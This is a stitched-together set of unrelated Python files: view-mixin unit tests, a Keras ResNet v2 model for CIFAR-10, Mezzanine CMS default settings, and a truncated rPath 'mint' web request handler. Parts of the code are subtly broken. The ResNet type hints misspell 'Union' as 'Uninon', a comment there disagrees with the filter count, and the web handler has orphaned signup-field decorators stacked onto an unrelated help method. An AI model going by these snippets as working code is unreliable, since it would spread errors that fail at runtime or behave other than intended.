self.request.dbsession = mock.Mock()
def test_list_mixin(self):
class ListViewTest(mixins.ListModelMixin, MockAPIView):
pass
view = ListViewTest()
response = view.list(self.request)
assert response.status_code == 200
assert json.loads(response.body.decode('utf-8')) == [{"id": 1, "name": "testing"}]
def test_list_mixin_no_page(self):
class ListViewTest(mixins.ListModelMixin, MockAPIViewNoPage):
pass
view = ListViewTest()
response = view.list(self.request)
assert response.status_code == 200
assert json.loads(response.body.decode('utf-8')) == [
{"id": 1, "name": "testing"}, {"id": 2, "name": "testing 2"}
]
def test_retrieve_mixin(self):
class RetrieveViewTest(mixins.RetrieveModelMixin, MockAPIView):
pass
view = RetrieveViewTest()
response = view.retrieve(self.request, id=1)
assert response.status_code == 200
assert json.loads(response.body.decode('utf-8')) == {"id": 1, "name": "testing"}
def test_create_mixin(self):
class CreateViewTest(mixins.CreateModelMixin, MockAPIView):
pass
view = CreateViewTest()
view.request = self.request
self.request.json_body = {'id': 3, 'name': 'testing 3'}
response = view.create(self.request)
assert response.status_code == 201
assert json.loads(response.body.decode('utf-8')) == {"id": 3, "name": "testing 3"}
assert self.request.dbsession.add.call_count == 1
def test_bad_create_mixin(self):
class CreateViewTest(mixins.CreateModelMixin, MockAPIView):
pass
view = CreateViewTest()
view.request = self.request
self.request.json_body = {'id': 4, 'name': 'testing 4'}
response = view.create(self.request)
assert response.status_code == 400
assert json.loads(response.body.decode('utf-8')) == {"id": ["invalid value."]}
def test_update(self):
class UpdateViewTest(mixins.UpdateModelMixin, MockAPIView):
pass
view = UpdateViewTest()
self.request.json_body = {'id': 1, 'name': 'testing1'}
response = view.update(self.request)
assert response.status_code == 200
assert json.loads(response.body.decode('utf-8')) == {"id": 1, "name": "testing1"}
def test_bad_update(self):
class UpdateViewTest(mixins.UpdateModelMixin, MockAPIView):
pass
view = UpdateViewTest()
self.request.json_body = {'id': 4, 'name': '4testing'}
response = view.update(self.request)
assert response.status_code == 400
def test_partial_update(self):
class UpdateViewTest(mixins.PartialUpdateMixin, MockAPIView):
pass
view = UpdateViewTest()
self.request.json_body = {'name': 'testing1'}
response = view.partial_update(self.request)
assert response.status_code == 200
assert json.loads(response.body.decode('utf-8')) == {"id": 1, "name": "testing1"}
def test_destroy(self):
class DestroyViewTest(mixins.DestroyModelMixin, MockAPIView):
pass
view = DestroyViewTest()
view.request = self.request
response = view.destroy(self.request)
assert response.status_code == 204
assert self.request.dbsession.delete.call_count == 1
class TestActionSchemaMixin(TestCase):
def setUp(self):
self.view = ActionMixinView()
def test_retrieve(self):
self.view.action = 'retrieve'
assert self.view.get_schema_class() == 'retrieve_schema'
def test_list(self):
self.view.action = 'list'
assert self.view.get_schema_class() == 'list_schema'
def test_update(self):
self.view.action = 'update'
assert self.view.get_schema_class() == 'update_schema'
def test_partial_update(self):
self.view.action = 'partial_update'
assert self.view.get_schema_class() == 'update_schema'
def test_create(self):
self.view.action = 'create'
assert self.view.get_schema_class() == 'create_schema'
def test_destroy(self):
self.view.action = 'destroy'
assert self.view.get_schema_class() == 'destroy_schema'
def test_default(self):
self.view.action = 'default'
assert self.view.get_schema_class() == 'schema_class'
|
|
# Copyright 2019 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ResNet20, 56, 110, 164, 1001 version 2 for CIFAR-10
# Paper: https://arxiv.org/pdf/1603.05027.pdf
"""
Modified from: https://git.io/JsPhA
"""
from typing import Union
import tensorflow as tf
from tensorflow.keras import Model, Input
from tensorflow.keras.layers import (
Conv2D,
Dense,
BatchNormalization,
ReLU,
Add,
AveragePooling2D,
GlobalAvgPool2D
)
from tensorflow.keras.regularizers import l2
WEIGHT_DECAY = 0.0005
def stem(inputs: tf.Tensor) -> tf.Tensor:
"""Construct Stem Convolutional Group
:inputs: the input vector
"""
x = Conv2D(
16,
(3, 3),
strides=(1, 1),
padding="same",
use_bias=False,
kernel_regularizer=l2(WEIGHT_DECAY)
)(inputs)
x = BatchNormalization()(x)
x = ReLU()(x)
return x
def learner(x: tf.Tensor, n_blocks: int) -> tf.Tensor:
"""Construct the Learner
x : input to the learner
n_blocks : number of blocks in a group
"""
# First Residual Block Group of 16 filters (Stage 1)
# Quadruple (4X) the size of filters to fit the next Residual Group
x = residual_group(x, 16, n_blocks, strides=(1, 1), n=4)
# Second Residual Block Group of 64 filters (Stage 2)
# Double (2X) the size of filters and reduce feature maps by 75% (strides=2)
# to fit the next Residual Group.
x = residual_group(x, 64, n_blocks, n=2)
# Third Residual Block Group of 64 filters (Stage 3)
# Double (2X) the size of filters and reduce feature maps by 75% (strides=2)
# to fit the next Residual Group
x = residual_group(x, 128, n_blocks, n=2)
return x
def residual_group(x: tf.Tensor, n_filters: int, n_blocks: int,
strides: Uninon[int, tuple[int, int]] = (2, 2), n: int = 2) -> tf.Tensor:
"""Construct a Residual Group
x : input into the group
n_filters : number of filters for the group
n_blocks : number of residual blocks with identity link
strides : whether the projection block is a strided convolution
n : multiplier for the number of filters out
"""
# Double the size of filters to fit the first Residual Group
x = projection_block(x, n_filters, strides=strides, n=n)
# Identity residual blocks
for _ in range(n_blocks):
x = identity_block(x, n_filters, n)
return x
def identity_block(x: tf.Tensor, n_filters: int, n: int = 2) -> tf.Tensor:
"""Construct a Bottleneck Residual Block of Convolutions
x : input into the block
n_filters: number of filters
n : multiplier for filters out
"""
# Save input vector (feature maps) for the identity link
shortcut = x
## Construct the 1x1, 3x3, 1x1 residual block (fig 3c)
# Dimensionality reduction
x = BatchNormalization()(x)
x = ReLU()(x)
x = Conv2D(
n_filters,
(1, 1),
strides=(1, 1),
use_bias=False,
kernel_regularizer=l2(WEIGHT_DECAY)
)(x)
# Bottleneck layer
x = BatchNormalization()(x)
x = ReLU()(x)
x = Conv2D(
n_filters,
(3, 3),
strides=(1, 1),
padding="same",
use_bias=False,
kernel_regularizer=l2(WEIGHT_DECAY)
)(x)
# Dimensionality restoration - increase the number of output filters by
# 2X or 4X
x = BatchNormalization()(x)
x = ReLU()(x)
x = Conv2D(
n_filters * n,
(1, 1),
strides=(1, 1),
use_bias=False,
kernel_regularizer=l2(WEIGHT_DECAY)
)(x)
# Add the identity link (input) to the output of the residual block
x = Add()([x, shortcut])
return x
def projection_block(x: tf.Tensor, n_filters: int,
strides: Uninon[int, tuple[int, int]] = (2, 2), n: int = 2) -> tf.Tensor:
"""Construct a Bottleneck Residual Block with Projection Shortcut
Increase the number of filters by 2X (or 4X on first stage)
x : input into the block
n_filters: number of filters
strides : whether the first convolution is strided
n : multiplier for number of filters out
"""
# Construct the projection shortcut
# Increase filters by 2X (or 4X) to match shape when added to output of block
shortcut = Conv2D(
n_filters * n,
(1, 1),
strides=strides,
use_bias=False,
kernel_regularizer=l2(WEIGHT_DECAY)
)(x)
## Construct the 1x1, 3x3, 1x1 convolution block
# Dimensionality reduction
x = BatchNormalization()(x)
x = ReLU()(x)
x = Conv2D(
n_filters,
(1, 1),
strides=(1, 1),
use_bias=False,
kernel_regularizer=l2(WEIGHT_DECAY)
)(x)
# Bottleneck layer - feature pooling when strides=(2, 2)
x = BatchNormalization()(x)
x = ReLU()(x)
x = Conv2D(
n_filters,
(3, 3),
strides=strides,
padding="same",
use_bias=False,
kernel_regularizer=l2(WEIGHT_DECAY)
)(x)
# Dimensionality restoration - increase the number of filters by 2X (or 4X)
x = BatchNormalization()(x)
x = ReLU()(x)
x = Conv2D(
n_filters * n,
(1, 1),
strides=(1, 1),
use_bias=False,
kernel_regularizer=l2(WEIGHT_DECAY)
)(x)
# Add the projection shortcut to the output of the residual block
x = Add()([shortcut, x])
return x
def classifier(x: tf.Tensor, n_classes: int = 10) -> tf.Tensor:
"""Construct a Classifier
x : input into the classifier
n_classes : number of classes
"""
# Pool the feature maps after the end of all the residual blocks
x = BatchNormalization()(x)
x = ReLU()(x)
x = AveragePooling2D(pool_size=8)(x)
# Flatten into 1D vector
x = GlobalAvgPool2D()(x)
# Final Dense Outputting Layer
outputs = Dense(n_classes, activation="softmax",
kernel_initializer="he_normal")(x)
return outputs
# -------------------
# Model | n |
# ResNet20 | 2 |
# ResNet56 | 6 |
# ResNet110 | 12 |
# ResNet164 | 18 |
# ResNet1001 | 111 |
#
n = 18
depth = n * 9 + 2
n_blocks = ((depth - 2) // 9) - 1
# The input tensor
inputs = Input(shape=(32, 32, 3))
# The Stem Convolution Group
x = stem(inputs)
# The learner
x = learner(x, n_blocks)
# The Classifier for 10 classes
outputs = classifier(x, 10)
# Instantiate the Model
model = Model(inputs, outputs)
|
|
"""
Default settings for the ``mezzanine.core`` app. Each of these can be
overridden in your project's settings module, just like regular
Django settings. The ``editable`` argument for each controls whether
the setting is editable via Django's admin.
Thought should be given to how a setting is actually used before
making it editable, as it may be inappropriate - for example settings
that are only read during startup shouldn't be editable, since changing
them would require an application reload.
"""
from __future__ import unicode_literals
from django.conf import settings
from django.utils.translation import ugettext_lazy as _
from mezzanine.conf import register_setting
register_setting(
name="ADMIN_MENU_ORDER",
description=_("Controls the ordering and grouping of the admin menu."),
editable=False,
default=(
(_("Content"), ("pages.Page", "blog.BlogPost",
"generic.ThreadedComment", (_("Media Library"), "media-library"),)),
(_("Site"), ("sites.Site", "redirects.Redirect", "conf.Setting")),
(_("Users"), ("auth.User", "auth.Group",)),
),
)
register_setting(
name="ADMIN_MENU_COLLAPSED",
label=_("Collapse the Admin menu"),
description=_("Controls whether or not the left-hand admin menu is "
"collapsed by default."),
editable=True,
default=False,
)
register_setting(
name="ADMIN_REMOVAL",
description=_("Unregister these models from the admin."),
editable=False,
default=(),
)
register_setting(
name="ADMIN_THUMB_SIZE",
description=_("Size of thumbnail previews for image fields in the "
"admin interface."),
editable=False,
default="24x24",
)
register_setting(
name="AKISMET_API_KEY",
label=_("Akismet API Key"),
description=_("Key for http://akismet.com spam filtering service. Used "
"for filtering comments and forms."),
editable=True,
default="",
)
register_setting(
name="BITLY_ACCESS_TOKEN",
label=_("bit.ly access token"),
description=_("Access token for http://bit.ly URL shortening service."),
editable=True,
default="",
)
register_setting(
name="CACHE_SET_DELAY_SECONDS",
description=_("Mezzanine's caching uses a technique know as mint "
"caching. This is where the requested expiry for a cache entry "
"is stored with the cache entry in cache, and the real expiry "
"used has the ``CACHE_SET_DELAY`` added to it. Then on a cache get, "
"the store expiry is checked, and if it has passed, the cache entry "
"is set again, and no entry is returned. This tries to ensure that "
"cache misses never occur, and if many clients were to get a cache "
"miss at once, only one would actually need to re-generated the "
"cache entry."),
editable=False,
default=30,
)
if "mezzanine.blog" in settings.INSTALLED_APPS:
dashboard_tags = (
("blog_tags.quick_blog", "mezzanine_tags.app_list"),
("comment_tags.recent_comments",),
("mezzanine_tags.recent_actions",),
)
else:
dashboard_tags = (
("mezzanine_tags.app_list",),
("mezzanine_tags.recent_actions",),
(),
)
register_setting(
name="DASHBOARD_TAGS",
description=_("A three item sequence, each containing a sequence of "
"template tags used to render the admin dashboard."),
editable=False,
default=dashboard_tags,
)
register_setting(
name="DEVICE_DEFAULT",
description=_("Device specific template sub-directory to use as the "
"default device."),
editable=False,
default="",
)
register_setting(
name="DEVICE_USER_AGENTS",
description=_("Mapping of device specific template sub-directory names to "
"the sequence of strings that may be found in their user agents."),
editable=False,
default=(
("mobile", ("2.0 MMP", "240x320", "400X240", "AvantGo", "BlackBerry",
"Blazer", "Cellphone", "Danger", "DoCoMo", "Elaine/3.0",
"EudoraWeb", "Googlebot-Mobile", "hiptop", "IEMobile",
"KYOCERA/WX310K", "LG/U990", "MIDP-2.", "MMEF20", "MOT-V",
"NetFront", "Newt", "Nintendo Wii", "Nitro", "Nokia",
"Opera Mini", "Palm", "PlayStation Portable", "portalmmm",
"Proxinet", "ProxiNet", "SHARP-TQ-GX10", "SHG-i900",
"Small", "SonyEricsson", "Symbian OS", "SymbianOS",
"TS21i-10", "UP.Browser", "UP.Link", "webOS", "Windows CE",
"WinWAP", "YahooSeeker/M1A1-R2D2", "iPhone", "iPod", "Android",
"BlackBerry9530", "LG-TU915 Obigo", "LGE VX", "webOS",
"Nokia5800",)),
),
)
register_setting(
name="FORMS_USE_HTML5",
description=_("If ``True``, website forms will use HTML5 features."),
editable=False,
default=False,
)
register_setting(
name="EMAIL_FAIL_SILENTLY",
description=_("If ``True``, failures to send email will happen "
"silently, otherwise an exception is raised. "
"Defaults to ``settings.DEBUG``."),
editable=False,
default=settings.DEBUG,
)
register_setting(
name="EXTRA_MODEL_FIELDS",
description=_("A sequence of fields that will be injected into "
"Mezzanine's (or any library's) models. Each item in the sequence is "
"a four item sequence. The first two items are the dotted path to the "
"model and its field name to be added, and the dotted path to the "
"field class to use for the field. The third and fourth items are a "
"sequence of positional args and a dictionary of keyword args, to use "
"when creating the field instance. When specifying the field class, "
"the path ``django.models.db.`` can be omitted for regular Django "
"model fields."),
editable=False,
default=(),
)
register_setting(
name="GOOGLE_ANALYTICS_ID",
label=_("Google Analytics ID"),
description=_("Google Analytics ID (http://www.google.com/analytics/)"),
editable=True,
default="",
)
register_setting(
name="GOOGLE_MAPS_API_KEY",
label=_("Google Maps API Key"),
description=_("Key for Google Maps API (http://www.maps.google.com)"),
editable=True,
default="",
)
register_setting(
name="HOST_THEMES",
description=_("A sequence mapping host names to themes, allowing "
"different templates to be served per HTTP host. "
"Each item in the sequence is a two item sequence, "
"containing a host such as ``othersite.example.com``, and "
"the name of an importable Python package for the theme. "
"If the host is matched for a request, the templates "
"directory inside the theme package will be first searched "
"when loading templates."),
editable=False,
default=(),
)
register_setting(
name="INLINE_EDITING_ENABLED",
description=_("If ``True``, front-end inline editing will be enabled."),
editable=False,
default=True,
)
register_setting(
name="JQUERY_FILENAME",
label=_("Name of the jQuery file."),
description=_("Name of the jQuery file found in "
"mezzanine/core/static/mezzanine/js/"),
editable=False,
default="jquery-1.8.3.min.js",
)
register_setting(
name="JQUERY_UI_FILENAME",
label=_("Name of the jQuery UI file."),
description=_("Name of the jQuery UI file found in "
"mezzanine/core/static/mezzanine/js/"),
editable=False,
default="jquery-ui-1.8.24.min.js",
)
register_setting(
name="MAX_PAGING_LINKS",
label=_("Max paging links"),
description=_("Max number of paging links to display when paginating."),
editable=True,
default=10,
)
register_setting(
name="MEDIA_LIBRARY_PER_SITE",
label=_("Media library per site"),
description=_("If ``True``, each site will use its own directory within "
"the filebrowser media library."),
editable=False,
default=False,
)
register_setting(
name="OWNABLE_MODELS_ALL_EDITABLE",
description=_("Models that subclass ``Ownable`` and use the "
"``OwnableAdmin`` have their admin change-list records filtered "
"down to records owned by the current user. This setting contains a "
"sequence of models in the format ``app_label.object_name``, that "
"when subclassing ``Ownable``, will still show all records in the "
"admin change-list interface, regardless of the current user."),
editable=False,
default=(),
)
register_setting(
name="RICHTEXT_WIDGET_CLASS",
description=_("Dotted package path and class name of the widget to use "
"for the ``RichTextField``."),
editable=False,
default="mezzanine.core.forms.TinyMceWidget",
)
register_setting(
name="RICHTEXT_ALLOWED_TAGS",
description=_("List of HTML tags that won't be stripped from "
"``RichTextField`` instances."),
editable=False,
default=("a", "abbr", "acronym", "address", "area", "article", "aside",
"b", "bdo", "big", "blockquote", "br", "button", "caption", "center",
"cite", "code", "col", "colgroup", "dd", "del", "dfn", "dir", "div",
"dl", "dt", "em", "fieldset", "figure", "font", "footer", "form",
"h1", "h2", "h3", "h4", "h5", "h6", "header", "hr", "i", "img",
"input", "ins", "kbd", "label", "legend", "li", "map", "menu",
"nav", "ol", "optgroup", "option", "p", "pre", "q", "s", "samp",
"section", "select", "small", "span", "strike", "strong",
"sub", "sup", "table", "tbody", "td", "textarea",
"tfoot", "th", "thead", "tr", "tt", "u", "ul", "var", "wbr"),
)
register_setting(
name="RICHTEXT_ALLOWED_ATTRIBUTES",
description=_("List of HTML attributes that won't be stripped from "
"``RichTextField`` instances."),
editable=False,
default=("currency", "price", "abbr", "accept", "accept-charset", "accesskey", "action",
"align", "alt", "axis", "border", "cellpadding", "cellspacing",
"char", "charoff", "charset", "checked", "cite", "class", "clear",
"cols", "colspan", "color", "compact", "coords", "datetime", "dir",
"disabled", "enctype", "for", "frame", "headers", "height", "href",
"hreflang", "hspace", "id", "ismap", "label", "lang", "longdesc",
"maxlength", "media", "method", "multiple", "name", "nohref",
"noshade", "nowrap", "prompt", "readonly", "rel", "rev", "rows",
"rowspan", "rules", "scope", "selected", "shape", "size", "span",
"src", "start", "style", "summary", "tabindex", "target", "title",
"type", "usemap", "valign", "value", "vspace", "width", "xml:lang"),
)
register_setting(
name="RICHTEXT_ALLOWED_STYLES",
description=_("List of inline CSS styles that won't be stripped from "
"``RichTextField`` instances."),
editable=False,
default=("border", "display", "float", "list-style-type", "margin",
"margin-bottom", "margin-left", "margin-right", "margin-top",
"padding-left", "text-align", "text-decoration", "vertical-align"),
)
register_setting(
name="RICHTEXT_FILTERS",
description=_("List of dotted paths to functions, called in order, on a "
"``RichTextField`` value before it is rendered to the template."),
editable=False,
default=("mezzanine.utils.html.thumbnails",),
)
RICHTEXT_FILTER_LEVEL_HIGH = 1
RICHTEXT_FILTER_LEVEL_LOW = 2
RICHTEXT_FILTER_LEVEL_NONE = 3
RICHTEXT_FILTER_LEVELS = (
(RICHTEXT_FILTER_LEVEL_HIGH, _("High")),
(RICHTEXT_FILTER_LEVEL_LOW, _("Low (allows video, iframe, Flash, etc)")),
(RICHTEXT_FILTER_LEVEL_NONE, _("No filtering")),
)
register_setting(
name="RICHTEXT_FILTER_LEVEL",
label=_("Rich Text filter level"),
description=_("*Do not change this setting unless you know what you're "
"doing.*\n\nWhen content is saved in a Rich Text (WYSIWYG) field, "
"unsafe HTML tags and attributes are stripped from the content to "
"protect against staff members intentionally adding code that could "
"be used to cause problems, such as changing their account to "
"a super-user with full access to the system.\n\n"
"This setting allows you to change the level of filtering that "
"occurs. Setting it to low will allow certain extra tags to be "
"permitted, such as those required for embedding video. While these "
"tags are not the main candidates for users adding malicious code, "
"they are still considered dangerous and could potentially be "
"mis-used by a particularly technical user, and so are filtered out "
"when the filtering level is set to high.\n\n"
"Setting the filtering level to no filtering, will disable all "
"filtering, and allow any code to be entered by staff members, "
"including script tags."),
editable=True,
choices=RICHTEXT_FILTER_LEVELS,
default=RICHTEXT_FILTER_LEVEL_HIGH,
)
register_setting(
name="SEARCH_MODEL_CHOICES",
description=_("Sequence of models that will be provided by default as "
"choices in the search form. Each model should be in the format "
"``app_label.model_name``. Only models that subclass "
"``mezzanine.core.models.Displayable`` should be used."),
editable=False,
default=("pages.Page", "blog.BlogPost"),
)
register_setting(
name="SEARCH_PER_PAGE",
label=_("Search results per page"),
description=_("Number of results shown in the search results page."),
editable=True,
default=10,
)
register_setting(
name="SITE_PREFIX",
description=_("A URL prefix for mounting all of Mezzanine's urlpatterns "
"under. When using this, you'll also need to manually apply it to "
"your project's root ``urls.py`` module. The root ``urls.py`` module "
"provided by Mezzanine's ``mezzanine-project`` command contains an "
"example of this towards its end."),
editable=False,
default="",
)
register_setting(
name="SITE_TITLE",
label=_("Site Title"),
description=_("Title that will display at the top of the site, and be "
"appended to the content of the HTML title tags on every page."),
editable=True,
default="Mezzanine",
translatable=True,
)
register_setting(
name="SITE_TAGLINE",
label=_("Tagline"),
description=_("A tag line that will appear at the top of all pages."),
editable=True,
default=_("An open source content management platform."),
translatable=True,
)
register_setting(
name="SLUGIFY",
description=_("Dotted Python path to the callable for converting "
"strings into URL slugs. Defaults to "
"``mezzanine.utils.urls.slugify_unicode`` which allows for non-ascii "
"URLs. Change to ``django.template.defaultfilters.slugify`` to use "
"Django's slugify function, or something of your own if required."),
editable=False,
default="mezzanine.utils.urls.slugify_unicode",
)
register_setting(
name="SPAM_FILTERS",
description=_("Sequence of dotted Python paths to callable functions "
"used for checking posted content (such as forms or comments) is "
"spam. Each function should accept three arguments: the request "
"object, the form object, and the URL that was posted from. "
"Defaults to ``mezzanine.utils.views.is_spam_akismet`` which will "
"use the http://akismet.com spam filtering service when the "
"``AKISMET_API_KEY`` setting is configured."),
editable=False,
default=("mezzanine.utils.views.is_spam_akismet",),
)
register_setting(
name="SSL_ENABLED",
label=_("Enable SSL"),
description=_("If ``True``, users will be automatically redirected to "
"HTTPS for the URLs specified by the ``SSL_FORCE_URL_PREFIXES`` "
"setting."),
editable=True,
default=False,
)
register_setting(
name="SSL_FORCE_HOST",
label=_("Force Host"),
description=_("Host name that the site should always be accessed via that "
"matches the SSL certificate."),
editable=True,
default="",
)
register_setting(
name="SSL_FORCE_URL_PREFIXES",
description="Sequence of URL prefixes that will be forced to run over "
"SSL when ``SSL_ENABLED`` is ``True``. i.e. "
"('/admin', '/example') would force all URLs beginning with "
"/admin or /example to run over SSL.",
editable=False,
default=("/admin", "/account"),
)
register_setting(
name="SSL_FORCED_PREFIXES_ONLY",
description=_("If ``True``, only URLs specified by the "
"``SSL_FORCE_URL_PREFIXES`` setting will be accessible over SSL, "
"and all other URLs will be redirected back to HTTP if accessed "
"over HTTPS."),
editable=False,
default=True,
)
register_setting(
name="STOP_WORDS",
description=_("List of words which will be stripped from search queries."),
editable=False,
default=(
"a", "about", "above", "above", "across", "after",
"afterwards", "again", "against", "all", "almost", "alone",
"along", "already", "also", "although", "always", "am",
"among", "amongst", "amoungst", "amount", "an", "and",
"another", "any", "anyhow", "anyone", "anything", "anyway",
"anywhere", "are", "around", "as", "at", "back", "be",
"became", "because", "become", "becomes", "becoming", "been",
"before", "beforehand", "behind", "being", "below", "beside",
"besides", "between", "beyond", "bill", "both", "bottom",
"but", "by", "call", "can", "cannot", "cant", "co", "con",
"could", "couldnt", "cry", "de", "describe", "detail", "do",
"done", "down", "due", "during", "each", "eg", "eight",
"either", "eleven", "else", "elsewhere", "empty", "enough",
"etc", "even", "ever", "every", "everyone", "everything",
"everywhere", "except", "few", "fifteen", "fifty", "fill",
"find", "fire", "first", "five", "for", "former", "formerly",
"forty", "found", "four", "from", "front", "full", "further",
"get", "give", "go", "had", "has", "hasnt", "have", "he",
"hence", "her", "here", "hereafter", "hereby", "herein",
"hereupon", "hers", "herself", "him", "himself", "his",
"how", "however", "hundred", "ie", "if", "in", "inc",
"indeed", "interest", "into", "is", "it", "its", "itself",
"keep", "last", "latter", "latterly", "least", "less", "ltd",
"made", "many", "may", "me", "meanwhile", "might", "mill",
"mine", "more", "moreover", "most", "mostly", "move", "much",
"must", "my", "myself", "name", "namely", "neither", "never",
"nevertheless", "next", "nine", "no", "nobody", "none",
"noone", "nor", "not", "nothing", "now", "nowhere", "of",
"off", "often", "on", "once", "one", "only", "onto", "or",
"other", "others", "otherwise", "our", "ours", "ourselves",
"out", "over", "own", "part", "per", "perhaps", "please",
"put", "rather", "re", "same", "see", "seem", "seemed",
"seeming", "seems", "serious", "several", "she", "should",
"show", "side", "since", "sincere", "six", "sixty", "so",
"some", "somehow", "someone", "something", "sometime",
"sometimes", "somewhere", "still", "such", "system", "take",
"ten", "than", "that", "the", "their", "them", "themselves",
"then", "thence", "there", "thereafter", "thereby",
"therefore", "therein", "thereupon", "these", "they",
"thickv", "thin", "third", "this", "those", "though",
"three", "through", "throughout", "thru", "thus", "to",
"together", "too", "top", "toward", "towards", "twelve",
"twenty", "two", "un", "under", "until", "up", "upon", "us",
"very", "via", "was", "we", "well", "were", "what", "whatever",
"when", "whence", "whenever", "where", "whereafter", "whereas",
"whereby", "wherein", "whereupon", "wherever", "whether",
"which", "while", "whither", "who", "whoever", "whole", "whom",
"whose", "why", "will", "with", "within", "without", "would",
"yet", "you", "your", "yours", "yourself", "yourselves", "the",
),
)
register_setting(
name="TAG_CLOUD_SIZES",
label=_("Tag Cloud Sizes"),
description=_("Number of different sizes for tags when shown as a cloud."),
editable=True,
default=4,
)
register_setting(
name="TEMPLATE_ACCESSIBLE_SETTINGS",
description=_("Sequence of setting names available within templates."),
editable=False,
default=(
"ACCOUNTS_APPROVAL_REQUIRED", "ACCOUNTS_VERIFICATION_REQUIRED",
"ADMIN_MENU_COLLAPSED",
"BITLY_ACCESS_TOKEN", "BLOG_USE_FEATURED_IMAGE",
"COMMENTS_DISQUS_SHORTNAME", "COMMENTS_NUM_LATEST",
"COMMENTS_DISQUS_API_PUBLIC_KEY", "COMMENTS_DISQUS_API_SECRET_KEY",
"COMMENTS_USE_RATINGS", "DEV_SERVER", "FORMS_USE_HTML5",
"GRAPPELLI_INSTALLED", "GOOGLE_MAPS_API_KEY", "GOOGLE_ANALYTICS_ID",
"JQUERY_FILENAME",
"JQUERY_UI_FILENAME", "LOGIN_URL", "LOGOUT_URL", "SITE_TITLE",
"SITE_TAGLINE", "USE_L10N", "USE_MODELTRANSLATION",
),
)
register_setting(
name="THUMBNAILS_DIR_NAME",
description=_("Directory name to store thumbnails in, that will be "
"created relative to the original image's directory."),
editable=False,
default=".thumbnails",
)
register_setting(
name="TINYMCE_SETUP_JS",
description=_("URL for the JavaScript file (relative to ``STATIC_URL``) "
"that handles configuring TinyMCE when the default "
"``RICHTEXT_WIDGET_CLASS`` is used."),
editable=False,
default="mezzanine/js/tinymce_setup.js",
)
register_setting(
name="UPLOAD_TO_HANDLERS",
description=_("Dict mapping file field names in the format "
"``app_label.model_name.field_name`` to the Python dotted path "
"to function names that will be used for the file field's "
"``upload_to`` argument."),
editable=False,
default={},
)
# The following settings are defined here for documentation purposes
# as this file is used to auto-generate the documentation for all
# available settings. They are Mezzanine specific, but their values
# are *always* overridden by the project's settings or local_settings
# modules, so the default values defined here will never be used.
register_setting(
name="USE_MODELTRANSLATION",
description=_("If ``True``, the django-modeltranslation application will "
"be automatically added to the ``INSTALLED_APPS`` setting."),
editable=False,
default=False,
)
register_setting(
name="NEVERCACHE_KEY",
description=_("Unique random string like ``SECRET_KEY``, but used for "
"two-phased cache responses. Like ``SECRET_KEY``, should be "
"automatically generated by the ``mezzanine-project`` command."),
editable=False,
default="",
)
|
|
#
# Copyright (c) SAS Institute Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import errno
import logging
import os
from urllib import unquote
from webob import exc as web_exc
from mint import urltypes
from mint import mint_error
from mint import shimclient
from mint.lib.unixutils import AtomicFile
from mint.web.fields import boolFields, intFields, strFields
from mint.web.decorators import requiresAdmin
from mint.web.decorators import requiresHttps
from mint.web.webhandler import WebHandler
from mint.web.webhandler import normPath
from conary.lib import digestlib
from conary.lib import util
log = logging.getLogger(__name__)
BUFFER=1024 * 256
class SiteHandler(WebHandler):
def handle(self, context):
self.__dict__.update(**context)
path = normPath(context['cmd'])
cmd = path.split('/')[1]
if not cmd:
self._redirectOldLinks()
try:
method = self.__getattribute__(cmd)
except AttributeError:
raise web_exc.HTTPNotFound()
if not callable(method):
raise web_exc.HTTPNotFound()
return method
@strFields(user = '', password = '')
def pwCheck(self, auth, user, password):
ret = 'false'
if self.cfg.configured and (not self.cfg.SSL
or self.req.scheme == 'https'):
ret = str(bool(self.client.pwCheck(user, password))).lower()
return """<auth valid="%s" />\n""" % ret
@strFields(newUsername = '', email = '', email2 = '',
password = '', password2 = '',
fullName = '', displayEmail = '',
blurb = '', tos='', privacy='')
@strFields(page = "")
@intFields(step = 1)
def help(self, auth, page, step):
self._redirect("http://docs.rpath.com")
def logout(self, auth):
self._clearAuth()
self._redirectHttp()
@requiresHttps
@strFields(username = None)
def resetPassword(self, auth, username):
userId = self.client.getUserIdByName(username)
user = self.client.getUser(userId)
self._resetPasswordById(userId)
return self._write("passwordReset", email = user.getEmail())
@requiresHttps
@strFields(username = None, password = '', action = 'login', to = '/')
@boolFields(rememberMe = False)
@intFields(x = 0, y = 0)
def processLogin(self, auth, username, password, action, to, rememberMe,
x, y):
if action == 'login':
authToken = (username, password)
client = shimclient.ShimMintClient(self.cfg, authToken, self.db)
auth = client.checkAuth()
if not auth.authorized:
raise mint_error.InvalidLogin
else:
self.session['authToken'] = (authToken[0], '')
self.session['firstPage'] = unquote(to)
self.session.save()
self._redirectHttp()
else:
raise web_exc.HTTPNotFound()
@intFields(fileId = 0, urlType = urltypes.LOCAL)
def downloadImage(self, auth, fileId, urlType):
reqFilename = None
try:
if not fileId:
cmds = self.cmd.split('/')
fileId = int(cmds[1])
reqFilename = cmds[2]
except ValueError:
raise web_exc.HTTPNotFound()
# Screen out UrlTypes that are not visible, except for urltypes.LOCAL,
# which is ALWAYS visible.
if not (urlType == urltypes.LOCAL \
or urlType in self.cfg.visibleUrlTypes):
raise web_exc.HTTPNotFound()
try:
buildId, idx, title, fileUrls = self.client.getFileInfo(fileId)
except mint_error.FileMissing:
raise web_exc.HTTPNotFound()
# Special rules for handling the default case (urltypes.LOCAL):
# If self.cfg.redirectUrlType is set AND that FileUrl exists,
# then use it.
redirectUrl = None
overrideRedirect = None
filename = None
urlIdMap = {}
for urlId, t, u in fileUrls:
urlIdMap[u] = urlId
if t == urltypes.LOCAL:
filename = u
elif t == urlType:
redirectUrl = u
if t == self.cfg.redirectUrlType:
overrideRedirect = u
# For urltype.LOCAL, construct the redirect URL
# Use override redirect if it's set (e.g. redirecting to Amazon S3).
if urlType == urltypes.LOCAL:
if overrideRedirect:
redirectUrl = overrideRedirect
elif filename:
# Don't pass through bad filenames if they are specified in
# the request.
if reqFilename and os.path.basename(filename) != reqFilename:
